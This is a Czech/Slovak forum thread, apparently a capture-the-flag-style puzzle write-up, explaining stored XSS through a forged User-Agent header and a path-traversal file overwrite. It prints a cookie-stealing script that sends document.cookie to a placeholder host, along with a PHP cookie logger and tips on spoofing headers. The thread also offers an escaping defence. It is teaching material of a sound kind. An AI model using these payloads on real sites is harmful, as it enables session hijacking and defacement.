hadanka c.5 - vysvetlenie

******* http://pc.poradna.net/question/view/66560-hadanka-c -5-obnov-stranku *******
ok, vidim ze este nie ste pripraveni na real web hacking a preto dalsia hadanka bude lahsia a bude z kategorie basic web hacking. budem sa tu snazit vysvetlit jednotlive kroky a ich dosah, ale rozhodol som sa, ze vam to nepoviem naraz(mam rad napatie). budem to vysvetlovat po jednotlivych krokoch(celkovo su 3) a s tyzdnovym odstupom, aby ste sa este samostatne mohli(aj ked neskoro) dostat do hall of fame.
1., najprv bolo treba najst dolezitu informaciu, kde je vlastne zaloha povodnych stranok. ta sa nachadzala v subore help.html(bolo treba pozriet do zdrojakov a odscrollovat ), na hlavnej stranke link - help.
- ponaucenie: aj ked nasi hackeri boli ocividne spicky, urobili jednu podstatnu chybu a to ze dolezite informacie ulozili do html zdrojakov, aj ked si mysleli ze ich nikto nenajde.

2., tu som chybu urobil ja. urobil som sice monitoring navstevnosti, ktory zabezpecoval script monitoring.php ale neuvedomil som si, ze aj informacie typu user_agent mozu byt zneuzite(user agent switcher(ff), proxomitron(proxy server)). tu mi utocnik vlozil cookie stealer a pri prihlaseni sa pod adminom a prezreti si monitoringu som o svoje cookie prisiel. mozny cookie stealer bol:

<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>

nejaky_cookie_citac.php mohol vyzerat takto:

<?php
 $cookie = $_GET['c'];
 $fp = fopen('mycookies.html', 'a');
 fwrite($fp, "$cookie\n<br>");
 fclose($fp);
?>

-ponaucenie: pokial si na svojej stranke zaznamenavate aj informacie typu napr. user_agent, referrer, tak treba mysliet nato, ze aj toto je mozne zneuzit(nie len input z formulara alebo z url) a najlepsie je podla mna zmenit

< a >

na znakove entity:

&#60; a &#62;

, je s tym najmenej roboty.

3., a mame tu posledny bod. stacilo vojst do admin toolu, zadat meno a heslo, ktore sme adminovi ukradli a ako meno suboru uviest index.html a obsah spravy bol prave povodny html kod index.html v adresari _tmp_. bolo si vsak treba uvedomit ze sme v adresari _tmp_, preto ako meno sme pouzili: ../index.html(relativna cesta o uroven vyssie) alebo sme mohli pouzit absolutnu cestu: index.html. akceptovana bola aj index.html. tymto sme prepisali povodny index.html.
-ponaucenie: davajte si velkeho bacha, ak dovolite zapisovat sobory na vas web, aby tam nahodou niekto nezapisal vlastny php shell. :D

Předmět	Autor	Datum
Toto mi pripomenulo jeden mail, ktorý mi prišiel: Pozerajte s apozorne na obrázok a čakajte, kým ko… msx. 29.11.2006 21:05	msx.	29.11.2006 21:05
jen tak dalej... uz se tesim parser, tam totiz bude urcite naka kravina, kvuli ktery sem to vzdal...… angel333 01.12.2006 13:36	angel333	01.12.2006 13:36
kedy bude dalsie pokracovanie? :)) to se pozna, ze mam slovenske predky :-) angel333 05.12.2006 19:05	angel333	05.12.2006 19:05
som myslel ze az zajtra, ale mozem to v podstate napisat aj dnes. //edit: slovencina ti fakt ide dob… IgorK 05.12.2006 19:32	IgorK	05.12.2006 19:32
ne ne, v pohode, ja nespecham, ja len, jestli si na to nezabudol :-) ps: jsem jenom z 1/4 slovak angel333 05.12.2006 20:14	angel333	05.12.2006 20:14
ps: jsem jenom z 1/4 slovak - po starej mame alebo starom otcovi? :-) IgorK 05.12.2006 20:19	IgorK	05.12.2006 20:19
po brachovi ]:) Jan Fiala 05.12.2006 20:21	Jan Fiala	05.12.2006 20:21
no napadli ma rozne kombinacie. radsej budem ticho. :-D IgorK 05.12.2006 20:32	IgorK	05.12.2006 20:32
:-D stara mama normalni mamy :-D angel333 05.12.2006 20:38	angel333	05.12.2006 20:38
slovenskych predkov Mezi smajlíky už podle mě píše česky. Slovensky by bylo: "to sa pozna, ze mam s… Kráťa 06.12.2006 00:50	Kráťa	06.12.2006 00:50
Abych rekl popravde ma narodnost je taky slovenska ale slovensky neumim ani prd takze radeji budu ml… virus 06.12.2006 06:35	virus	06.12.2006 06:35
vsak ja taky ne :-) jen sem si to chtel zkusit, ale je to tezsi, nez sem si myslel :)) angel333 06.12.2006 10:58	angel333	06.12.2006 10:58
updated, pozri hore. p.s.: ok, tato hadanka bola dost tazka a chcel som mat od vas na 1/2 roka pokoj… IgorK 11.12.2006 23:11	IgorK	11.12.2006 23:11
Kdybych na to měl čas...:-( Zatím jsem totéž též vypátral. Napnutý jako xˇanda (šle), očekávám happy… Rce 11.12.2006 23:32	Rce	11.12.2006 23:32
happy end bude. nakoniec zachranime moju deravu stranku. ;-) IgorK 12.12.2006 00:12	IgorK	12.12.2006 00:12
to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek,… angel333-skola 12.12.2006 09:10	angel333-skola	12.12.2006 09:10
Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonc… MM.. 12.12.2006 10:50	MM..	12.12.2006 10:50
cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript...… angel333 12.12.2006 19:44	angel333	12.12.2006 19:44
proxomitron je uplne easy. ako dobre vies, user agent sa posiela v hlavicke http packetu, takze si t… IgorK 12.12.2006 20:11	IgorK	12.12.2006 20:11
Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris poloz… poslední MM.. 30.12.2006 00:45	MM..	30.12.2006 00:45
updated. btw., pripravil som pre vas dalsie 2 hadanky, ale zacneme od zakladov. nebudu teda take taz… IgorK 25.12.2006 14:43	IgorK	25.12.2006 14:43

Toto mi pripomenulo jeden mail, ktorý mi prišiel:

Pozerajte s apozorne na obrázok a čakajte, kým kocúr Silvester chýtí Tweetyho, stojí to za to. Potom čítajte ďalej. Bol to animovaný GIF, tak som to po nejakých 6 sekundách vzdal a čítal som ďalej:

To byl test idiotù. Jak dlouho jste se díval/a?

0-2 sekundy - jeste máte nadeji
2-5 sekund - mal/a jste spatný den?
5-10 sekund - treba jen pomaleji ctete?
10-20 sekund - opakovat trídu není nic, za co byste se musel/a stydet
20-30 sekund - plození potomkù radeji prenechte jiným
30 sek.-1 min. - pravdepodobne to stejne ani neumíte precíst, tak proc se zdrzovat?
1-2 min. - ekvivalent prùmerné pokojové rostliny
2-5 min. - Dobrý den Jessico Simpsonová
5 min.-1 hod. - mrtvoly tady skórujou
1 hod. a více - gratulujeme. Vase IQ se nalézá v záporných hodnotách. Abyste videl/a, jaká je Vase odmena, pozorujte zajíce, dokud nesní svou mrkev...

jen tak dalej... uz se tesim parser, tam totiz bude urcite naka kravina, kvuli ktery sem to vzdal...

//update: joa ten retro design ( index.html ) je super

kedy bude dalsie pokracovanie? to se pozna, ze mam slovenske predky

som myslel ze az zajtra, ale mozem to v podstate napisat aj dnes.
//edit: slovencina ti fakt ide dobre. mas tam len malu chybicku: slovenskych predkov.

ne ne, v pohode, ja nespecham, ja len, jestli si na to nezabudol

ps: jsem jenom z 1/4 slovak

ps: jsem jenom z 1/4 slovak - po starej mame alebo starom otcovi?

po brachovi

no napadli ma rozne kombinacie. radsej budem ticho.

stara mama normalni mamy

slovenskych predkov

Mezi smajlíky už podle mě píše česky. Slovensky by bylo: "to sa pozna, ze mam slovenskych predkov" ne?
Číli jeho sdělení je "československé".

Abych rekl popravde ma narodnost je taky slovenska ale slovensky neumim ani prd takze radeji budu mluvit jak mluvim, jakykoliv pokus odemne napsat slovensky cokoliv by vypukl paskvilem.
Pamatuji pratetku ve stavniku kdyz neco chtela a ja nevedel co to je, odpoved vzdy vypadala stylem pokus omyl.
Narodil jsem se v cechach.

vsak ja taky ne jen sem si to chtel zkusit, ale je to tezsi, nez sem si myslel

updated, pozri hore.
p.s.: ok, tato hadanka bola dost tazka a chcel som mat od vas na 1/2 roka pokoj. nabuduce uz bude lahsia a zacneme od zakladov. potom ked budete ready, prejdeme znova na takyto druh hadaniek.

Kdybych na to měl čas... Zatím jsem totéž též vypátral. Napnutý jako xˇanda (šle), očekávám happy end .

happy end bude. nakoniec zachranime moju deravu stranku.

to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek, ale to mi zase asi orezal wget

Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonca staci ak by to bola linka ale na nu by musel admin kliknut. Dolezite je len ze si odosles cookie na svoj server (kam vedie ta linka). Samozrejme musis mat niekde hosting a tvoj php script ktory ti ten cookie niekde ulozi (to je ten druhy 5riadkovy php script).

cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript... melo se to zadat do user-agenta, takze jsem si udelal cmd soubor, do nej jsem dal

wget --user-agent <script>blablalba....

ale von me wget jedny uvozovky nak nebral, druhy bral ale nak jinak to neslo, no proste sem neprosel pres svyho wgeta

zkousel jsem i proxytron (nebo jak se to jmenuje), ale ten se mi nepovedlo rozchodit, nak sem vubec nepochopil system tech filtru, tak sem to hned vzdal.

dalsi moznost je samozrejme naky rozsireni do firefoxu, ale ff nepouzivam a instalovat ho.. nechci

proxomitron je uplne easy. ako dobre vies, user agent sa posiela v hlavicke http packetu, takze si to mal nastavit v Headers a tam si mozes pozriet, ako sa to nastavuje napr. pre mozillu a urobit si to podla toho.

Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris polozku general.useragent.override).
Ak FF nechces tak to je ale tvoja smola, namiesto 5sekund s FF sa drbes 3dni s nejakymi wget a proximitronmi

updated. btw., pripravil som pre vas dalsie 2 hadanky, ale zacneme od zakladov. nebudu teda take tazke, ale dufam ze sa pri nich dobre pobavite. tato hadanka bola uz z kategorie realistic.

Zpět do poradny Odpovědět na původní otázku Nahoru